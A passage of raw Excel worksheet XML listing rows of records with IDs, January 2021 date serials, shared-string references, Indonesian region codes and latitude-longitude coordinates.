        <v>32</v>
      </c>
      <c r="Q2761" t="s">
        <v>9358</v>
      </c>
      <c r="R2761" t="s">
        <v>9359</v>
      </c>
      <c r="S2761" t="s">
        <v>1464</v>
      </c>
      <c r="T2761" t="s">
        <v>42</v>
      </c>
      <c r="U2761" s="5">
        <v>10764971</v>
      </c>
      <c r="V2761" s="5" t="s">
        <v>16934</v>
      </c>
      <c r="W2761" s="5">
        <v>-694236</v>
      </c>
      <c r="X2761" t="s">
        <v>20672</v>
      </c>
      <c r="Y2761" t="str">
        <f t="shared" si="43"/>
        <v>-6.94236,107.64971</v>
      </c>
    </row>
    <row r="2762" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2762">
        <v>226830</v>
      </c>
      <c r="B2762" s="1">
        <v>44218</v>
      </c>
      <c r="C2762" s="2">
        <v>0.35484953703703703</v>
      </c>
      <c r="D2762" t="s">
        <v>22</v>
      </c>
      <c r="E2762" t="s">
        <v>23</v>
      </c>
      <c r="F2762" t="s">
        <v>9360</v>
      </c>
      <c r="G2762" t="s">
        <v>9361</v>
      </c>
      <c r="H2762" t="s">
        <v>26</v>
      </c>
      <c r="I2762" t="s">
        <v>1005</v>
      </c>
      <c r="J2762" t="s">
        <v>9316</v>
      </c>
      <c r="L2762" t="s">
        <v>9362</v>
      </c>
      <c r="M2762">
        <v>9410030003</v>
      </c>
      <c r="N2762">
        <v>9410030</v>
      </c>
      <c r="O2762">
        <v>9410</v>
      </c>
      <c r="P2762">
        <v>94</v>
      </c>
      <c r="Q2762" t="s">
        <v>9318</v>
      </c>
      <c r="R2762" t="s">
        <v>9319</v>
      </c>
      <c r="S2762" t="s">
        <v>9320</v>
      </c>
      <c r="T2762" t="s">
        <v>9321</v>
      </c>
      <c r="U2762" s="5">
        <v>13637668</v>
      </c>
      <c r="V2762" s="5" t="s">
        <v>16935</v>
      </c>
      <c r="W2762" s="5">
        <v>-392848</v>
      </c>
      <c r="X2762" t="s">
        <v>20673</v>
      </c>
      <c r="Y2762" t="str">
        <f t="shared" si="43"/>
        <v>-3.92848,136.37668</v>
      </c>
    </row>
    <row r="2763" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2763">
        <v>226897</v>
      </c>
      <c r="B2763" s="1">
        <v>44218</v>
      </c>
      <c r="C2763" s="2">
        <v>0.57769675925925923</v>
      </c>
      <c r="D2763" t="s">
        <v>22</v>
      </c>
      <c r="E2763" t="s">
        <v>23</v>
      </c>
      <c r="F2763" t="s">
        <v>9363</v>
      </c>
      <c r="G2763" t="s">
        <v>9364</v>
      </c>
      <c r="H2763" t="s">
        <v>26</v>
      </c>
      <c r="I2763" t="s">
        <v>137</v>
      </c>
      <c r="J2763" t="s">
        <v>2627</v>
      </c>
      <c r="L2763" t="s">
        <v>9365</v>
      </c>
      <c r="M2763">
        <v>3201110003</v>
      </c>
      <c r="N2763">
        <v>3201110</v>
      </c>
      <c r="O2763">
        <v>3201</v>
      </c>
      <c r="P2763">
        <v>32</v>
      </c>
      <c r="Q2763" t="s">
        <v>2730</v>
      </c>
      <c r="R2763" t="s">
        <v>9366</v>
      </c>
      <c r="S2763" t="s">
        <v>421</v>
      </c>
      <c r="T2763" t="s">
        <v>42</v>
      </c>
      <c r="U2763" s="5">
        <v>10697183</v>
      </c>
      <c r="V2763" s="5" t="s">
        <v>16936</v>
      </c>
      <c r="W2763" s="5">
        <v>-670291</v>
      </c>
      <c r="X2763" t="s">
        <v>20674</v>
      </c>
      <c r="Y2763" t="str">
        <f t="shared" si="43"/>
        <v>-6.70291,106.97183</v>
      </c>
    </row>
    <row r="2764" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2764">
        <v>226899</v>
      </c>
      <c r="B2764" s="1">
        <v>44218</v>
      </c>
      <c r="C2764" s="2">
        <v>0.63754629629629633</v>
      </c>
      <c r="D2764" t="s">
        <v>22</v>
      </c>
      <c r="E2764" t="s">
        <v>23</v>
      </c>
      <c r="F2764" t="s">
        <v>9367</v>
      </c>
      <c r="G2764" t="s">
        <v>9368</v>
      </c>
      <c r="H2764" t="s">
        <v>26</v>
      </c>
      <c r="I2764" t="s">
        <v>893</v>
      </c>
      <c r="J2764" t="s">
        <v>8176</v>
      </c>
      <c r="L2764" t="s">
        <v>9369</v>
      </c>
      <c r="M2764">
        <v>7171031004</v>
      </c>
      <c r="N2764">
        <v>7171031</v>
      </c>
      <c r="O2764">
        <v>7171</v>
      </c>
      <c r="P2764">
        <v>71</v>
      </c>
      <c r="Q2764" t="s">
        <v>9370</v>
      </c>
      <c r="R2764" t="s">
        <v>9371</v>
      </c>
      <c r="S2764" t="s">
        <v>8180</v>
      </c>
      <c r="T2764" t="s">
        <v>8181</v>
      </c>
      <c r="U2764" s="5">
        <v>12485818</v>
      </c>
      <c r="V2764" s="5" t="s">
        <v>16937</v>
      </c>
      <c r="W2764" s="5">
        <v>146776</v>
      </c>
      <c r="X2764" t="s">
        <v>20675</v>
      </c>
      <c r="Y2764" t="str">
        <f t="shared" si="43"/>
        <v>1.46776,124.85818</v>
      </c>
    </row>
    <row r="2765" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2765">
        <v>226900</v>
      </c>
      <c r="B2765" s="1">
        <v>44218</v>
      </c>
      <c r="C2765" s="2">
        <v>0.69012731481481471</v>
      </c>
      <c r="D2765" t="s">
        <v>22</v>
      </c>
      <c r="E2765" t="s">
        <v>23</v>
      </c>
      <c r="F2765" t="s">
        <v>9372</v>
      </c>
      <c r="G2765" t="s">
        <v>9373</v>
      </c>
      <c r="H2765" t="s">
        <v>26</v>
      </c>
      <c r="I2765" t="s">
        <v>882</v>
      </c>
      <c r="J2765" t="s">
        <v>8176</v>
      </c>
      <c r="M2765">
        <v>7171020004</v>
      </c>
      <c r="N2765">
        <v>7171020</v>
      </c>
      <c r="O2765">
        <v>7171</v>
      </c>
      <c r="P2765">
        <v>71</v>
      </c>
      <c r="Q2765" t="s">
        <v>9374</v>
      </c>
      <c r="R2765" t="s">
        <v>9375</v>
      </c>
      <c r="S2765" t="s">
        <v>8180</v>
      </c>
      <c r="T2765" t="s">
        <v>8181</v>
      </c>
      <c r="U2765" s="5">
        <v>12483586</v>
      </c>
      <c r="V2765" s="5" t="s">
        <v>16938</v>
      </c>
      <c r="W2765" s="5">
        <v>146304</v>
      </c>
      <c r="X2765" t="s">
        <v>20676</v>
      </c>
      <c r="Y2765" t="str">
        <f t="shared" si="43"/>
        <v>1.46304,124.83586</v>
      </c>
    </row>
    <row r="2766" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2766">
        <v>226902</v>
      </c>
      <c r="B2766" s="1">
        <v>44219</v>
      </c>
      <c r="C2766" s="2">
        <v>7.273148148148148E-2</v>
      </c>
      <c r="D2766" t="s">
        <v>22</v>
      </c>
      <c r="E2766" t="s">
        <v>23</v>
      </c>
      <c r="F2766" t="s">
        <v>9376</v>
      </c>
      <c r="H2766" t="s">
        <v>26</v>
      </c>
      <c r="I2766" t="s">
        <v>137</v>
      </c>
      <c r="J2766" t="s">
        <v>3135</v>
      </c>
      <c r="L2766" t="s">
        <v>9377</v>
      </c>
      <c r="M2766">
        <v>3671020016</v>
      </c>
      <c r="N2766">
        <v>3671020</v>
      </c>
      <c r="O2766">
        <v>3671</v>
      </c>
      <c r="P2766">
        <v>36</v>
      </c>
      <c r="Q2766" t="s">
        <v>823</v>
      </c>
      <c r="R2766" t="s">
        <v>274</v>
      </c>
      <c r="S2766" t="s">
        <v>201</v>
      </c>
      <c r="T2766" t="s">
        <v>171</v>
      </c>
      <c r="U2766" s="5">
        <v>10670254</v>
      </c>
      <c r="V2766" s="5" t="s">
        <v>16939</v>
      </c>
      <c r="W2766" s="5">
        <v>-619391</v>
      </c>
      <c r="X2766" t="s">
        <v>20677</v>
      </c>
      <c r="Y2766" t="str">
        <f t="shared" si="43"/>
        <v>-6.19391,106.70254</v>
      </c>
    </row>
    <row r="2767" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2767">
        <v>226903</v>
      </c>
      <c r="B2767" s="1">
        <v>44219</v>
      </c>
      <c r="C2767" s="2">
        <v>8.2083333333333341E-2</v>
      </c>
      <c r="D2767" t="s">
        <v>22</v>
      </c>
      <c r="E2767" t="s">
        <v>23</v>
      </c>
      <c r="F2767" t="s">
        <v>9378</v>
      </c>
      <c r="H2767" t="s">
        <v>26</v>
      </c>
      <c r="I2767" t="s">
        <v>1538</v>
      </c>
      <c r="J2767" t="s">
        <v>3135</v>
      </c>
      <c r="L2767" t="s">
        <v>9379</v>
      </c>
      <c r="M2767">
        <v>3671020016</v>
      </c>
      <c r="N2767">
        <v>3671020</v>
      </c>
      <c r="O2767">
        <v>3671</v>
      </c>
      <c r="P2767">
        <v>36</v>
      </c>
      <c r="Q2767" t="s">
        <v>823</v>
      </c>
      <c r="R2767" t="s">
        <v>274</v>
      </c>
      <c r="S2767" t="s">
        <v>201</v>
      </c>
      <c r="T2767" t="s">
        <v>171</v>
      </c>
      <c r="U2767" s="5">
        <v>10670257</v>
      </c>
      <c r="V2767" s="5" t="s">
        <v>16940</v>
      </c>
      <c r="W2767" s="5">
        <v>-619391</v>
      </c>
      <c r="X2767" t="s">
        <v>20677</v>
      </c>
      <c r="Y2767" t="str">
        <f t="shared" si="43"/>
        <v>-6.19391,106.70257</v>
      </c>
    </row>
    <row r="2768" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2768">
        <v>226904</v>
      </c>
      <c r="B2768" s="1">
        <v>44219</v>
      </c>
      <c r="C2768" s="2">
        <v>8.475694444444444E-2</v>
      </c>
      <c r="D2768" t="s">
        <v>22</v>
      </c>
      <c r="E2768" t="s">
        <v>23</v>
      </c>
      <c r="F2768" t="s">
        <v>9380</v>
      </c>
      <c r="H2768" t="s">
        <v>26</v>
      </c>
      <c r="I2768" t="s">
        <v>1538</v>
      </c>
      <c r="J2768" t="s">
        <v>3135</v>
      </c>
      <c r="L2768" t="s">
        <v>9381</v>
      </c>
      <c r="M2768">
        <v>3671020016</v>
      </c>
      <c r="N2768">
        <v>3671020</v>
      </c>
      <c r="O2768">
        <v>3671</v>
      </c>
      <c r="P2768">
        <v>36</v>
      </c>
      <c r="Q2768" t="s">
        <v>823</v>
      </c>
      <c r="R2768" t="s">
        <v>274</v>
      </c>
      <c r="S2768" t="s">
        <v>201</v>
      </c>
      <c r="T2768" t="s">
        <v>171</v>
      </c>
      <c r="U2768" s="5">
        <v>10670257</v>
      </c>
      <c r="V2768" s="5" t="s">
        <v>16940</v>
      </c>
      <c r="W2768" s="5">
        <v>-619390</v>
      </c>
      <c r="X2768" t="s">
        <v>20678</v>
      </c>
      <c r="Y2768" t="str">
        <f t="shared" si="43"/>
        <v>-6.19390,106.70257</v>
      </c>
    </row>
    <row r="2769" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2769">
        <v>226906</v>
      </c>
      <c r="B2769" s="1">
        <v>44219</v>
      </c>
      <c r="C2769" s="2">
        <v>9.8726851851851857E-2</v>
      </c>
      <c r="D2769" t="s">
        <v>22</v>
      </c>
      <c r="E2769" t="s">
        <v>23</v>
      </c>
      <c r="F2769" t="s">
        <v>9382</v>
      </c>
      <c r="G2769" t="s">
        <v>9383</v>
      </c>
      <c r="H2769" t="s">
        <v>7086</v>
      </c>
      <c r="I2769" t="s">
        <v>7087</v>
      </c>
      <c r="J2769" t="s">
        <v>8060</v>
      </c>
      <c r="L2769" t="s">
        <v>9384</v>
      </c>
      <c r="M2769">
        <v>7604022003</v>
      </c>
      <c r="N2769">
        <v>7604022</v>
      </c>
      <c r="O2769">
        <v>7604</v>
      </c>
      <c r="P2769">
        <v>76</v>
      </c>
      <c r="Q2769" t="s">
        <v>9385</v>
      </c>
      <c r="R2769" t="s">
        <v>9385</v>
      </c>
      <c r="S2769" t="s">
        <v>8063</v>
      </c>
      <c r="T2769" t="s">
        <v>8064</v>
      </c>
      <c r="U2769" s="5">
        <v>11886324</v>
      </c>
      <c r="V2769" s="5" t="s">
        <v>16941</v>
      </c>
      <c r="W2769" s="5">
        <v>-267946</v>
      </c>
      <c r="X2769" t="s">
        <v>20679</v>
      </c>
      <c r="Y2769" t="str">
        <f t="shared" si="43"/>
        <v>-2.67946,118.86324</v>
      </c>
    </row>
    <row r="2770" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2770">
        <v>226920</v>
      </c>
      <c r="B2770" s="1">
        <v>44219</v>
      </c>
      <c r="C2770" s="2">
        <v>0.22491898148148148</v>
      </c>
      <c r="D2770" t="s">
        <v>22</v>
      </c>
      <c r="E2770" t="s">
        <v>23</v>
      </c>
      <c r="F2770" t="s">
        <v>9386</v>
      </c>
      <c r="G2770" t="s">
        <v>9387</v>
      </c>
      <c r="H2770" t="s">
        <v>7086</v>
      </c>
      <c r="I2770" t="s">
        <v>7087</v>
      </c>
      <c r="J2770" t="s">
        <v>1656</v>
      </c>
      <c r="L2770" t="s">
        <v>9388</v>
      </c>
      <c r="M2770">
        <v>3173080003</v>
      </c>
      <c r="N2770">
        <v>3173080</v>
      </c>
      <c r="O2770">
        <v>3173</v>
      </c>
      <c r="P2770">
        <v>31</v>
      </c>
      <c r="Q2770" t="s">
        <v>157</v>
      </c>
      <c r="R2770" t="s">
        <v>157</v>
      </c>
      <c r="S2770" t="s">
        <v>62</v>
      </c>
      <c r="T2770" t="s">
        <v>33</v>
      </c>
      <c r="U2770" s="5">
        <v>10682956</v>
      </c>
      <c r="V2770" s="5" t="s">
        <v>16942</v>
      </c>
      <c r="W2770" s="5">
        <v>-617429</v>
      </c>
      <c r="X2770" t="s">
        <v>18528</v>
      </c>
      <c r="Y2770" t="str">
        <f t="shared" si="43"/>
        <v>-6.17429,106.82956</v>
      </c>
    </row>
    <row r="2771" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2771">
        <v>226922</v>
      </c>
      <c r="B2771" s="1">
        <v>44219</v>
      </c>
      <c r="C2771" s="2">
        <v>0.29931712962962964</v>
      </c>
      <c r="D2771" t="s">
        <v>22</v>
      </c>
      <c r="E2771" t="s">
        <v>23</v>
      </c>
      <c r="F2771" t="s">
        <v>9389</v>
      </c>
      <c r="G2771" t="s">
        <v>9390</v>
      </c>
      <c r="H2771" t="s">
        <v>26</v>
      </c>
      <c r="I2771" t="s">
        <v>166</v>
      </c>
      <c r="J2771" t="s">
        <v>2622</v>
      </c>
      <c r="L2771" t="s">
        <v>9391</v>
      </c>
      <c r="M2771">
        <v>3506200016</v>
      </c>
      <c r="N2771">
        <v>3506200</v>
      </c>
      <c r="O2771">
        <v>3506</v>
      </c>
      <c r="P2771">
        <v>35</v>
      </c>
      <c r="Q2771" t="s">
        <v>9392</v>
      </c>
      <c r="R2771" t="s">
        <v>9393</v>
      </c>
      <c r="S2771" t="s">
        <v>8365</v>
      </c>
      <c r="T2771" t="s">
        <v>1221</v>
      </c>
      <c r="U2771" s="5">
        <v>11203628</v>
      </c>
      <c r="V2771" s="5" t="s">
        <v>16943</v>
      </c>
      <c r="W2771" s="5">
        <v>-777803</v>
      </c>
      <c r="X2771" t="s">
        <v>20680</v>
      </c>
      <c r="Y2771" t="str">
        <f t="shared" si="43"/>
        <v>-7.77803,112.03628</v>
      </c>
    </row>
    <row r="2772" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2772">
        <v>226923</v>
      </c>
      <c r="B2772" s="1">
        <v>44219</v>
      </c>
      <c r="C2772" s="2">
        <v>0.30021990740740739</v>
      </c>
      <c r="D2772" t="s">
        <v>22</v>
      </c>
      <c r="E2772" t="s">
        <v>23</v>
      </c>
      <c r="F2772" s="3" t="s">
        <v>9394</v>
      </c>
      <c r="G2772" t="s">
        <v>9395</v>
      </c>
      <c r="H2772" t="s">
        <v>26</v>
      </c>
      <c r="I2772" t="s">
        <v>1046</v>
      </c>
      <c r="J2772" t="s">
        <v>2608</v>
      </c>
      <c r="L2772" t="s">
        <v>9396</v>
      </c>
      <c r="M2772">
        <v>3375010011</v>
      </c>
      <c r="N2772">
        <v>3375010</v>
      </c>
      <c r="O2772">
        <v>3375</v>
      </c>
      <c r="P2772">
        <v>33</v>
      </c>
      <c r="Q2772" t="s">
        <v>489</v>
      </c>
      <c r="R2772" t="s">
        <v>6337</v>
      </c>
      <c r="S2772" t="s">
        <v>6246</v>
      </c>
      <c r="T2772" t="s">
        <v>1134</v>
      </c>
      <c r="U2772" s="5">
        <v>10964776</v>
      </c>
      <c r="V2772" s="5" t="s">
        <v>16944</v>
      </c>
      <c r="W2772" s="5">
        <v>-688389</v>
      </c>
      <c r="X2772" t="s">
        <v>20681</v>
      </c>
      <c r="Y2772" t="str">
        <f t="shared" si="43"/>
        <v>-6.88389,109.64776</v>
      </c>
    </row>
    <row r="2773" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2773">
        <v>226926</v>
      </c>
      <c r="B2773" s="1">
        <v>44219</v>
      </c>
      <c r="C2773" s="2">
        <v>0.4367476851851852</v>
      </c>
      <c r="D2773" t="s">
        <v>22</v>
      </c>
      <c r="E2773" t="s">
        <v>23</v>
      </c>
      <c r="F2773" t="s">
        <v>9397</v>
      </c>
      <c r="H2773" t="s">
        <v>26</v>
      </c>
      <c r="I2773" t="s">
        <v>1538</v>
      </c>
      <c r="J2773" t="s">
        <v>3135</v>
      </c>
      <c r="L2773" t="s">
        <v>9398</v>
      </c>
      <c r="M2773">
        <v>3671020016</v>
      </c>
      <c r="N2773">
        <v>3671020</v>
      </c>
      <c r="O2773">
        <v>3671</v>
      </c>
      <c r="P2773">
        <v>36</v>
      </c>
      <c r="Q2773" t="s">
        <v>823</v>
      </c>
      <c r="R2773" t="s">
        <v>274</v>
      </c>
      <c r="S2773" t="s">
        <v>201</v>
      </c>
      <c r="T2773" t="s">
        <v>171</v>
      </c>
      <c r="U2773" s="5">
        <v>10670257</v>
      </c>
      <c r="V2773" s="5" t="s">
        <v>16940</v>
      </c>
      <c r="W2773" s="5">
        <v>-619389</v>
      </c>
      <c r="X2773" t="s">
        <v>20682</v>
      </c>
      <c r="Y2773" t="str">
        <f t="shared" si="43"/>
        <v>-6.19389,106.70257</v>
      </c>
    </row>
    <row r="2774" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2774">
        <v>226927</v>
      </c>
      <c r="B2774" s="1">
        <v>44219</v>
      </c>
      <c r="C2774" s="2">
        <v>0.52856481481481488</v>
      </c>
      <c r="D2774" t="s">
        <v>22</v>
      </c>
      <c r="E2774" t="s">
        <v>23</v>
      </c>
      <c r="F2774" t="s">
        <v>9399</v>
      </c>
      <c r="G2774" t="s">
        <v>9400</v>
      </c>
      <c r="H2774" t="s">
        <v>7978</v>
      </c>
      <c r="I2774" t="s">
        <v>7979</v>
      </c>
      <c r="J2774" t="s">
        <v>7178</v>
      </c>
      <c r="L2774" t="s">
        <v>9401</v>
      </c>
      <c r="M2774">
        <v>1804090013</v>
      </c>
      <c r="N2774">
        <v>1804090</v>
      </c>
      <c r="O2774">
        <v>1804</v>
      </c>
      <c r="P2774">
        <v>18</v>
      </c>
      <c r="Q2774" t="s">
        <v>9402</v>
      </c>
      <c r="R2774" t="s">
        <v>9403</v>
      </c>
      <c r="S2774" t="s">
        <v>9404</v>
      </c>
      <c r="T2774" t="s">
        <v>2082</v>
      </c>
      <c r="U2774" s="5">
        <v>10562275</v>
      </c>
      <c r="V2774" s="5" t="s">
        <v>16945</v>
      </c>
      <c r="W2774" s="5">
        <v>-511843</v>
      </c>
      <c r="X2774" t="s">
        <v>20683</v>
      </c>
      <c r="Y2774" t="str">
        <f t="shared" si="43"/>
        <v>-5.11843,105.62275</v>
      </c>
    </row>
    <row r="2775" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2775">
        <v>226928</v>
      </c>
      <c r="B2775" s="1">
        <v>44219</v>
      </c>
      <c r="C2775" s="2">
        <v>0.54417824074074073</v>
      </c>
      <c r="D2775" t="s">
        <v>22</v>
      </c>
      <c r="E2775" t="s">
        <v>23</v>
      </c>
      <c r="F2775" s="3" t="s">
        <v>9405</v>
      </c>
      <c r="H2775" t="s">
        <v>26</v>
      </c>
      <c r="I2775" t="s">
        <v>1389</v>
      </c>
      <c r="J2775" t="s">
        <v>1656</v>
      </c>
      <c r="L2775" t="s">
        <v>9406</v>
      </c>
      <c r="M2775">
        <v>3173080003</v>
      </c>
      <c r="N2775">
        <v>3173080</v>
      </c>
      <c r="O2775">
        <v>3173</v>
      </c>
      <c r="P2775">
        <v>31</v>
      </c>
      <c r="Q2775" t="s">
        <v>157</v>
      </c>
      <c r="R2775" t="s">
        <v>157</v>
      </c>
      <c r="S2775" t="s">
        <v>62</v>
      </c>
      <c r="T2775" t="s">
        <v>33</v>
      </c>
      <c r="U2775" s="5">
        <v>10682715</v>
      </c>
      <c r="V2775" s="5" t="s">
        <v>16381</v>
      </c>
      <c r="W2775" s="5">
        <v>-617539</v>
      </c>
      <c r="X2775" t="s">
        <v>19329</v>
      </c>
      <c r="Y2775" t="str">
        <f t="shared" si="43"/>
        <v>-6.17539,106.82715</v>
      </c>
    </row>
    <row r="2776" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2776">
        <v>226932</v>
      </c>
      <c r="B2776" s="1">
        <v>44220</v>
      </c>
      <c r="C2776" s="2">
        <v>9.4537037037037031E-2</v>
      </c>
      <c r="D2776" t="s">
        <v>22</v>
      </c>
      <c r="E2776" t="s">
        <v>23</v>
      </c>
      <c r="F2776" t="s">
        <v>9407</v>
      </c>
      <c r="G2776" t="s">
        <v>9408</v>
      </c>
      <c r="H2776" t="s">
        <v>26</v>
      </c>
      <c r="I2776" t="s">
        <v>1280</v>
      </c>
      <c r="J2776" t="s">
        <v>2627</v>
      </c>
      <c r="L2776" t="s">
        <v>9409</v>
      </c>
      <c r="M2776">
        <v>3275010010</v>
      </c>
      <c r="N2776">
        <v>3275010</v>
      </c>
      <c r="O2776">
        <v>3275</v>
      </c>
      <c r="P2776">
        <v>32</v>
      </c>
      <c r="Q2776" t="s">
        <v>286</v>
      </c>
      <c r="R2776" t="s">
        <v>287</v>
      </c>
      <c r="S2776" t="s">
        <v>41</v>
      </c>
      <c r="T2776" t="s">
        <v>42</v>
      </c>
      <c r="U2776" s="5">
        <v>10694785</v>
      </c>
      <c r="V2776" s="5" t="s">
        <v>16946</v>
      </c>
      <c r="W2776" s="5">
        <v>-626129</v>
      </c>
      <c r="X2776" t="s">
        <v>20684</v>
      </c>
      <c r="Y2776" t="str">
        <f t="shared" si="43"/>
        <v>-6.26129,106.94785</v>
      </c>
    </row>
    <row r="2777" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2777">
        <v>226933</v>
      </c>
      <c r="B2777" s="1">
        <v>44220</v>
      </c>
      <c r="C2777" s="2">
        <v>0.18737268518518521</v>
      </c>
      <c r="D2777" t="s">
        <v>22</v>
      </c>
      <c r="E2777" t="s">
        <v>23</v>
      </c>
      <c r="F2777" t="s">
        <v>9410</v>
      </c>
      <c r="H2777" t="s">
        <v>26</v>
      </c>
      <c r="I2777" t="s">
        <v>137</v>
      </c>
      <c r="J2777" t="s">
        <v>2627</v>
      </c>
      <c r="L2777" t="s">
        <v>9411</v>
      </c>
      <c r="M2777">
        <v>3275060008</v>
      </c>
      <c r="N2777">
        <v>3275060</v>
      </c>
      <c r="O2777">
        <v>3275</v>
      </c>
      <c r="P2777">
        <v>32</v>
      </c>
      <c r="Q2777" t="s">
        <v>2473</v>
      </c>
      <c r="R2777" t="s">
        <v>114</v>
      </c>
      <c r="S2777" t="s">
        <v>41</v>
      </c>
      <c r="T2777" t="s">
        <v>42</v>
      </c>
      <c r="U2777" s="5">
        <v>10695670</v>
      </c>
      <c r="V2777" s="5" t="s">
        <v>16947</v>
      </c>
      <c r="W2777" s="5">
        <v>-624941</v>
      </c>
      <c r="X2777" t="s">
        <v>20685</v>
      </c>
      <c r="Y2777" t="str">
        <f t="shared" si="43"/>
        <v>-6.24941,106.95670</v>
      </c>
    </row>
    <row r="2778" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2778">
        <v>226934</v>
      </c>
      <c r="B2778" s="1">
        <v>44220</v>
      </c>
      <c r="C2778" s="2">
        <v>0.21961805555555555</v>
      </c>
      <c r="D2778" t="s">
        <v>22</v>
      </c>
      <c r="E2778" t="s">
        <v>23</v>
      </c>
      <c r="F2778" t="s">
        <v>9412</v>
      </c>
      <c r="H2778" t="s">
        <v>26</v>
      </c>
      <c r="I2778" t="s">
        <v>137</v>
      </c>
      <c r="J2778" t="s">
        <v>2845</v>
      </c>
      <c r="L2778" t="s">
        <v>9413</v>
      </c>
      <c r="M2778">
        <v>3172070003</v>
      </c>
      <c r="N2778">
        <v>3172070</v>
      </c>
      <c r="O2778">
        <v>3172</v>
      </c>
      <c r="P2778">
        <v>31</v>
      </c>
      <c r="Q2778" t="s">
        <v>2659</v>
      </c>
      <c r="R2778" t="s">
        <v>128</v>
      </c>
      <c r="S2778" t="s">
        <v>49</v>
      </c>
      <c r="T2778" t="s">
        <v>33</v>
      </c>
      <c r="U2778" s="5">
        <v>10693161</v>
      </c>
      <c r="V2778" s="5" t="s">
        <v>16948</v>
      </c>
      <c r="W2778" s="5">
        <v>-623491</v>
      </c>
      <c r="X2778" t="s">
        <v>20686</v>
      </c>
      <c r="Y2778" t="str">
        <f t="shared" si="43"/>
        <v>-6.23491,106.93161</v>
      </c>
    </row>
    <row r="2779" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2779">
        <v>226937</v>
      </c>
      <c r="B2779" s="1">
        <v>44220</v>
      </c>
      <c r="C2779" s="2">
        <v>0.31795138888888891</v>
      </c>
      <c r="D2779" t="s">
        <v>22</v>
      </c>
      <c r="E2779" t="s">
        <v>23</v>
      </c>
      <c r="F2779" t="s">
        <v>9414</v>
      </c>
      <c r="G2779" t="s">
        <v>9415</v>
      </c>
      <c r="H2779" t="s">
        <v>26</v>
      </c>
      <c r="I2779" t="s">
        <v>166</v>
      </c>
      <c r="J2779" t="s">
        <v>2627</v>
      </c>
      <c r="L2779" t="s">
        <v>9416</v>
      </c>
      <c r="M2779">
        <v>3204290005</v>
      </c>
      <c r="N2779">
        <v>3204290</v>
      </c>
      <c r="O2779">
        <v>3204</v>
      </c>
      <c r="P2779">
        <v>32</v>
      </c>
      <c r="Q2779" t="s">
        <v>9417</v>
      </c>
      <c r="R2779" t="s">
        <v>2170</v>
      </c>
      <c r="S2779" t="s">
        <v>1464</v>
      </c>
      <c r="T2779" t="s">
        <v>42</v>
      </c>
      <c r="U2779" s="5">
        <v>10774864</v>
      </c>
      <c r="V2779" s="5" t="s">
        <v>16949</v>
      </c>
      <c r="W2779" s="5">
        <v>-696205</v>
      </c>
      <c r="X2779" t="s">
        <v>20687</v>
      </c>
      <c r="Y2779" t="str">
        <f t="shared" si="43"/>
        <v>-6.96205,107.74864</v>
      </c>
    </row>
    <row r="2780" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2780">
        <v>226938</v>
      </c>
      <c r="B2780" s="1">
        <v>44221</v>
      </c>
      <c r="C2780" s="2">
        <v>0.27777777777777779</v>
      </c>
      <c r="D2780" t="s">
        <v>2648</v>
      </c>
      <c r="E2780" t="s">
        <v>23</v>
      </c>
      <c r="G2780" t="s">
        <v>9418</v>
      </c>
      <c r="H2780" t="s">
        <v>26</v>
      </c>
      <c r="J2780" t="s">
        <v>8086</v>
      </c>
      <c r="L2780" t="s">
        <v>9419</v>
      </c>
      <c r="M2780">
        <v>3171050005</v>
      </c>
      <c r="N2780">
        <v>3171050</v>
      </c>
      <c r="O2780">
        <v>3171</v>
      </c>
      <c r="P2780">
        <v>31</v>
      </c>
      <c r="Q2780" t="s">
        <v>8057</v>
      </c>
      <c r="R2780" t="s">
        <v>508</v>
      </c>
      <c r="S2780" t="s">
        <v>108</v>
      </c>
      <c r="T2780" t="s">
        <v>33</v>
      </c>
      <c r="U2780" s="5">
        <v>10677396</v>
      </c>
      <c r="V2780" s="5" t="s">
        <v>16950</v>
      </c>
      <c r="W2780" s="5">
        <v>-622817</v>
      </c>
      <c r="X2780" t="s">
        <v>20688</v>
      </c>
      <c r="Y2780" t="str">
        <f t="shared" si="43"/>
        <v>-6.22817,106.77396</v>
      </c>
    </row>
    <row r="2781" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2781">
        <v>226939</v>
      </c>
      <c r="B2781" s="1">
        <v>44221</v>
      </c>
      <c r="C2781" s="2">
        <v>0.27847222222222223</v>
      </c>
      <c r="D2781" t="s">
        <v>2648</v>
      </c>
      <c r="E2781" t="s">
        <v>23</v>
      </c>
      <c r="G2781" t="s">
        <v>9420</v>
      </c>
      <c r="H2781" t="s">
        <v>26</v>
      </c>
      <c r="J2781" t="s">
        <v>8086</v>
      </c>
      <c r="L2781" t="s">
        <v>9421</v>
      </c>
      <c r="M2781">
        <v>3171050005</v>
      </c>
      <c r="N2781">
        <v>3171050</v>
      </c>
      <c r="O2781">
        <v>3171</v>
      </c>
      <c r="P2781">
        <v>31</v>
      </c>
      <c r="Q2781" t="s">
        <v>8057</v>
      </c>
      <c r="R2781" t="s">
        <v>508</v>
      </c>
      <c r="S2781" t="s">
        <v>108</v>
      </c>
      <c r="T2781" t="s">
        <v>33</v>
      </c>
      <c r="U2781" s="5">
        <v>10677425</v>
      </c>
      <c r="V2781" s="5" t="s">
        <v>16630</v>
      </c>
      <c r="W2781" s="5">
        <v>-622878</v>
      </c>
      <c r="X2781" t="s">
        <v>18457</v>
      </c>
      <c r="Y2781" t="str">
        <f t="shared" si="43"/>
        <v>-6.22878,106.77425</v>
      </c>
    </row>
    <row r="2782" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2782">
        <v>227833</v>
      </c>
      <c r="B2782" s="1">
        <v>44223</v>
      </c>
      <c r="C2782" s="2">
